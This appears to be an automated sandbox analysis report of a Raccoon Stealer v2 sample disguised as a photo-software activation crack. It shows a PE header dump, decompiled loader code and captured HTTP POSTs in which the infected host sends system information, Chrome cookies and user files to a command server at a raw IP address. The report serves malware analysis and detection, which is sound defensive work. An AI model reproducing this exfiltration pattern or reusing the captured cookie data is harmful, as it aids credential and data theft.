00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 70 0e 00 00 2e 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 a0 0e 00 00 0c 00 00 00 26 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 b0 0e 00 00 04 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 c0 0e 00 00 3c 00 00 00 36 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL",bv! a n* ;.text`P`.data\|' (@`.rdataDPF:@`@.bss(`.edatan*,@0@.idata@0.CRT,@0.tls @0.rsrc@0.reloc; <@0B/48`@@B/19Rp@B/31]'@(@B/45-p.@B/57\&@0B/70#2@B/81s:<6@B/92P
Aug 5, 2022 13:54:25.544966936 CEST	14636	OUT	POST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=vuZP5ZW3D12Zo8G4 User-Agent: record Host: 51.195.166.178 Content-Length: 7421 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:25.545033932 CEST	14644	OUT	Data Raw: 2d 2d 76 75 5a 50 35 5a 57 33 44 31 32 5a 6f 38 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 79 73 74 65 6d 20 Data Ascii: --vuZP5ZW3D12Zo8G4Content-Disposition: form-data; name="file"; filename="System Info.txt"Content-Type: application/x-objectSystem Information: - Locale: English- Time zone: +60 minutes from GMT- OS: Windows 10 Pro- Architecture
Aug 5, 2022 13:54:25.621562004 CEST	14645	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw" Data Raw: 72 65 63 65 69 76 65 64 Data Ascii: received
Aug 5, 2022 13:54:26.529094934 CEST	14646	OUT	POST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=7p5ysQ91wEB9Uu5W User-Agent: record Host: 51.195.166.178 Content-Length: 597 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 37 70 35 79 73 51 39 31 77 45 42 39 55 75 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5c 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6f 62 6a 65 63 74 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 54 52 55 45 09 31 33 32 36 31 37 33 35 37 39 35 31 36 34 37 34 30 09 4e 49 44 09 64 6a 45 77 69 56 77 36 6d 31 56 65 56 73 7a 47 46 49 34 30 35 72 71 45 36 69 42 6c 6d 6b 74 6c 65 72 61 51 7a 74 70 45 45 41 65 41 63 61 77 5a 77 31 4a 34 38 4f 70 5a 50 49 74 54 76 67 4d 53 50 34 63 48 33 71 45 71 75 43 33 55 47 4c 52 53 71 74 69 43 52 39 47 4a 59 35 78 4b 75 67 79 41 68 63 50 4e 32 52 37 62 67 5a 52 61 67 54 52 45 7a 71 35 67 6f 57 33 4f 46 58 43 79 6f 67 68 6f 42 61 32 4e 47 50 55 48 64 74 74 43 73 6e 43 71 48 69 65 6a 47 42 46 39 66 6b 76 45 77 54 59 4b 6d 49 34 46 76 54 64 71 6f 35 6e 2b 70 58 43 62 7a 47 52 57 38 66 6c 69 4b 49 51 34 47 6e 46 67 55 48 6f 2f 35 74 44 65 58 65 46 43 30 5a 2f 46 30 55 71 75 74 53 42 49 34 49 2b 37 4a 65 6e 2b 51 6c 6c 62 77 55 59 79 31 44 4c 6a 44 45 30 48 33 45 37 53 78 6c 53 6f 53 6f 58 53 67 32 4b 41 2f 46 74 6f 7a 4d 42 4b 49 64 34 62 79 56 5a 78 6b 79 59 3d 0a 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 7c 78 39 54 61 76 79 70 41 47 54 42 75 7a 39 66 75 55 45 35 4a 66 67 4e 76 6c 45 2b 72 74 2b 2b 6c 32 4f 37 7a 54 53 76 51 57 55 45 3d 7c 38 35 2e 30 2e 34 31 38 33 2e 31 32 31 2d 36 34 0d 0a 0d 0a 2d 2d 37 70 35 79 73 51 39 31 77 45 42 39 55 75 35 57 2d 2d Data Ascii: --7p5ysQ91wEB9Uu5WContent-Disposition: form-data; name="file"; filename="\cookies.txt"Content-Type: application/x-object.google.comTRUE/TRUE13261735795164740NIDdjEwiVw6m1VeVszGFI405rqE6iBlmktleraQztpEEAeAcawZw1J48OpZPItTvgMSP4cH3qEquC3UGLRSqtiCR9GJY5xKugyAhcPN2R7bgZRagTREzq5goW3OFXCyoghoBa2NGPUHdttCsnCqHiejGBF9fkvEwTYKmI4FvTdqo5n+pXCbzGRW8fliKIQ4GnFgUHo/5tDeXeFC0Z/F0UqutSBI4I+7Jen+QllbwUYy1DLjDE0H3E7SxlSoSoXSg2KA/FtozMBKId4byVZxkyY=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\|x9TavypAGTBuz9fuUE5JfgNvlE+rt++l2O7zTSvQWUE=\|85.0.4183.121-64--7p5ysQ91wEB9Uu5W--
Aug 5, 2022 13:54:26.601373911 CEST	14647	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw" Data Raw: 72 65 63 65 69 76 65 64 Data Ascii: received
Aug 5, 2022 13:54:28.059319019 CEST	14650	OUT	POST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=L0zZl9hiqF02yJ84 User-Agent: record Host: 51.195.166.178 Content-Length: 7135 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:28.059390068 CEST	14657	OUT	Data Raw: 0d 0a 2d 2d 4c 30 7a 5a 6c 39 68 69 71 46 30 32 79 4a 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 2d 2d 2d 66 69 Data Ascii: --L0zZl9hiqF02yJ84Content-Disposition: form-data; name="file"; filename="---files---desktop---KZWFNRXYKI---NIKHQAIQAU.jpg"Content-Type: application/x-objectNIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNOD
Aug 5, 2022 13:54:28.123226881 CEST	14660	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw" Data Raw: 72 65 63 65 69 76 65 64 Data Ascii: received
Aug 5, 2022 13:54:28.133527040 CEST	14661	OUT	POST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=f8gayI5MWfrI48MR User-Agent: record Host: 51.195.166.178 Content-Length: 7147 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:28.133716106 CEST	14668	OUT	Data Raw: 0d 0a 2d 2d 66 38 67 61 79 49 35 4d 57 66 72 49 34 38 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 2d 2d 2d 66 69 Data Ascii: --f8gayI5MWfrI48MRContent-Disposition: form-data; name="file"; filename="---files---documents---KZWFNRXYKI---NIKHQAIQAU.jpg"Content-Type: application/x-objectNIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTN
Aug 5, 2022 13:54:28.193248034 CEST	14669	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw" Data Raw: 72 65 63 65 69 76 65 64 Data Ascii: received
Aug 5, 2022 13:54:28.198246002 CEST	14669	OUT	POST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=8sc6O1CFgD9wm6aq User-Agent: record Host: 51.195.166.178 Content-Length: 3565 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:28.199318886 CEST	14673	OUT	Data Raw: 0d 0a 2d 2d 38 73 63 36 4f 31 43 46 67 44 39 77 6d 36 61 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 2d 2d 2d 66 69 Data Ascii: --8sc6O1CFgD9wm6aqContent-Disposition: form-data; name="file"; filename="---files---downloads---BPMLNOBVSB.jpg"Content-Type: application/x-objectBPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURS
Aug 5, 2022 13:54:28.258095026 CEST	14674	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw" Data Raw: 72 65 63 65 69 76 65 64 Data Ascii: received

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: KbqArOlW06.exePID: 2740, Parent PID: 1144

General

Target ID:	0
Start time:	13:52:19
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\KbqArOlW06.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\KbqArOlW06.exe"
Imagebase:	0x720000
File size:	12978176 bytes
MD5 hash:	005297E7C0D555822B5A6F31FCDC7661
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 2.0.0-beta2.cps.exePID: 2332, Parent PID: 2740

General

Target ID:	16
Start time:	13:53:58
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
Imagebase:	0x9a0000
File size:	762660256 bytes
MD5 hash:	881CBC2DA4C6467AEC519F4909371AF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exePID: 5724, Parent PID: 2740

General

Target ID:	21
Start time:	13:54:08
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Imagebase:	0x400000
File size:	593460 bytes
MD5 hash:	B184AD382E1729FEEA1E7BB94307930F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpPID: 5096, Parent PID: 5724

General

Target ID:	22
Start time:	13:54:12
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Imagebase:	0x400000
File size:	772608 bytes
MD5 hash:	D8467CA1F529C6C6DECB1B82DBAED1DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exePID: 5724, Parent PID: 2740COMMON

Execution Graph

Execution Coverage:	22.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.8%
Total number of Nodes:	1597
Total number of Limit Nodes:	24

Executed Functions

Function 00404654 Relevance: 43.9, APIs: 7, Strings: 18, Instructions: 182
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00404654(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi) {
				char _v8;
				long _t48;
				_Unknown_base(*)()* _t51;
				_Unknown_base(*)()* _t52;
				_Unknown_base(*)()* _t58;
				intOrPtr _t63;
				void* _t64;
				signed int _t147;
				signed int _t149;
				intOrPtr _t156;
				intOrPtr _t158;
				intOrPtr _t159;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				intOrPtr _t183;
				struct HINSTANCE__* _t187;
				intOrPtr _t191;

				_t188 = __esi;
				_push(0);
				_push(__esi);
				_push(_t191);
				_push(0x404911);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				_t187 = GetModuleHandleA("kernel32.dll");
				_t48 = GetVersion();
				_t149 = 0;
				if(_t48 != 0x600) {
					_t188 = GetProcAddress(_t187, "SetDefaultDllDirectories");
					if(_t188 != 0) {
						_t147 =  *_t188(0x800);
						asm("sbb ebx, ebx");
						_t149 =  ~( ~_t147);
					}
				}
				if(_t149 == 0) {
					_t58 = GetProcAddress(_t187, "SetDllDirectoryW");
					if(_t58 != 0) {
						 *_t58(0x404960);
					}
					E004045A0( &_v8);
					E004031E8(0x40d494, _t149, _v8, _t187, _t188);
					if( *0x40d494 != 0) {
						_t63 =  *0x40d494; // 0x0
						_t64 = E004032F4(_t63);
						_t158 =  *0x40d494; // 0x0
						if( *((char*)(_t158 + _t64 - 1)) != 0x5c) {
							E004032FC(0x40d494, 0x40496c);
						}
						_t159 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t159);
						E004032FC( &_v8, "uxtheme.dll");
						E004045CC(_v8, _t149);
						_t161 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t161);
						E004032FC( &_v8, "userenv.dll");
						E004045CC(_v8, _t149);
						_t163 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t163);
						E004032FC( &_v8, "setupapi.dll");
						E004045CC(_v8, _t149);
						_t165 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t165);
						E004032FC( &_v8, "apphelp.dll");
						E004045CC(_v8, _t149);
						_t167 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t167);
						E004032FC( &_v8, "propsys.dll");
						E004045CC(_v8, _t149);
						_t169 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t169);
						E004032FC( &_v8, "dwmapi.dll");
						E004045CC(_v8, _t149);
						_t171 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t171);
						E004032FC( &_v8, "cryptbase.dll");
						E004045CC(_v8, _t149);
						_t173 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t173);
						E004032FC( &_v8, "oleacc.dll");
						E004045CC(_v8, _t149);
						_t175 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t175);
						E004032FC( &_v8, "version.dll");
						E004045CC(_v8, _t149);
						_t177 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t177);
						E004032FC( &_v8, "profapi.dll");
						E004045CC(_v8, _t149);
						_t179 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t179);
						E004032FC( &_v8, "comres.dll");
						E004045CC(_v8, _t149);
						_t181 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t181);
						E004032FC( &_v8, "clbcatq.dll");
						E004045CC(_v8, _t149);
						_t183 =  *0x40d494; // 0x0
						E0040322C( &_v8, _t183);
						E004032FC( &_v8, "ntmarta.dll");
						E004045CC(_v8, _t149);
					}
				}
				_t51 = GetProcAddress(_t187, "SetSearchPathMode");
				if(_t51 != 0) {
					 *_t51(0x8001);
				}
				_t52 = GetProcAddress(_t187, "SetProcessDEPPolicy");
				if(_t52 != 0) {
					 *_t52(1); // executed
				}
				_pop(_t156);
				 *[fs:eax] = _t156;
				_push(E00404918);
				return E00403198( &_v8);
			}

0x00404654
0x00404657
0x0040465a
0x0040465e
0x0040465f
0x00404664
0x00404667
0x00404674
0x00404676
0x0040467d
0x00404683
0x00404690
0x00404694
0x0040469b
0x004046a1
0x004046a3
0x004046a3
0x00404694
0x004046a7
0x004046b3
0x004046ba
0x004046c1
0x004046c1
0x004046c6
0x004046d3
0x004046df
0x004046e5
0x004046ea
0x004046ef
0x004046fa
0x00404706
0x00404706
0x0040470b
0x00404714
0x00404721
0x00404729
0x0040472e
0x00404737
0x00404744
0x0040474c
0x00404751
0x0040475a
0x00404767
0x0040476f
0x00404774
0x0040477d
0x0040478a
0x00404792
0x00404797
0x004047a0
0x004047ad
0x004047b5
0x004047ba
0x004047c3
0x004047d0
0x004047d8
0x004047dd
0x004047e6
0x004047f3
0x004047fb
0x00404800
0x00404809
0x00404816
0x0040481e
0x00404823
0x0040482c
0x00404839
0x00404841
0x00404846
0x0040484f
0x0040485c
0x00404864
0x00404869
0x00404872
0x0040487f
0x00404887
0x0040488c
0x00404895
0x004048a2
0x004048aa
0x004048af
0x004048b8
0x004048c5
0x004048cd
0x004048cd
0x004046df
0x004048d8
0x004048df
0x004048e6
0x004048e6
0x004048ee
0x004048f5
0x004048f9
0x004048f9
0x004048fd
